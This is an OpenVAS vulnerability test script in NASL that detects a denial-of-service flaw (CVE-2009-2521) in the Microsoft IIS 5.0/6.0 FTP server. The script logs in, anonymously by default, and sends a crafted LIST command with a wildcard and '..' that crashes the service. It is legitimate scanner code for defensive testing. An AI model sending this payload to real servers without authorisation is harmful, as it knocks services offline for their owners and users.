###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_ms_iis_ftpd_ls_dos_vuln.nasl 4510 2009-09-17 16:45:23Z sep $
#
# Microsoft IIS FTP Server 'ls' Command DOS Vulnerability
#
# Authors:
# Nikita MR <rnikita@secpod.com>
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_id(900944);
  script_version("$Revision: 1.0 $");
  script_tag(name:"cvss_base", value:"4.0");
  script_tag(name:"risk_factor", value:"Medium");
  script_cve_id("CVE-2009-2521");
  script_bugtraq_id(36273);
  script_name("Microsoft IIS FTP Server 'ls' Command DOS Vulnerability");
  desc = "
  Overview: The host is running Microsoft IIS with FTP server and
  is prone to Denial of Service vulnerability.

  Vulnerability Insight:
  A stack consumption error occurs in the FTP server while processing crafted
  LIST command containing a wildcard that references a subdirectory followed by
  a .. (dot dot).

  Impact:
  Successful exploitation will allows remote authenticated users to crash the
  application leading to denial of service condition.

  Impact Level: Application

  Affected Software/OS:
  Microsoft Internet Information Services version 5.0 and 6.0

  Fix: Upgrade to IIS version 7.5
  http://www.iis.net/

  References:
  http://www.microsoft.com/technet/security/advisory/975191.mspx
  http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html
  http://blogs.technet.com/msrc/archive/2009/09/01/microsoft-security-advisory-975191-released.aspx
  http://blogs.technet.com/msrc/archive/2009/09/03/microsoft-security-advisory-975191-revised.aspx

  CVSS Score:
    CVSS Base Score     : 4.0 (AV:N/AC:L/Au:SI/C:N/I:N/A:P)
    CVSS Temporal Score : 3.1
  Risk factor: Medium";

  script_description(desc);
  script_summary("Verify the vulnerability through LIST command");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2009 SecPod");
  script_family("Denial of Service");
  script_dependencies("secpod_ftp_anonymous.nasl");
  script_require_ports("Services/ftp", 21);
  exit(0);
}


include("ftp_func.inc");
include("version_func.inc");

ftpPort = get_kb_item("Services/ftp");
if(!ftpPort){
  ftpPort = 21;
}

if(!get_port_state(ftpPort)) {
  exit(0);
}

banner = get_ftp_banner(port:ftpPort);
if("Microsoft FTP Service" >!< banner) {
  exit(0);
}

if(!safe_checks())
{
  soc = open_sock_tcp(ftpPort);
  if(!soc) {
    exit(0);
  }

  login = get_kb_item("ftp/login");
  if(!login){
    login = "anonymous";
  }
  pass = get_kb_item("ftp/password");
  if(!pass){
    pass = "anonymous";
  }

  if(ftp_authenticate(socket:soc, user: login, pass: pass))
  {
    cmd = 'LIST "-R */../"\r\n';	# The IIS server crashes and restarted.
    send(socket:soc, data:cmd);
    sleep(10);
    buff = recv(socket:soc, length:1024);

    ecmd = 'LIST\r\n';
    send(socket:soc, data:ecmd);
    eresp = recv(socket:soc, length:1024);
    if("Can't open data connection" >< eresp){
      security_warning(ftpPort);
    }
  }
  close(soc);
}
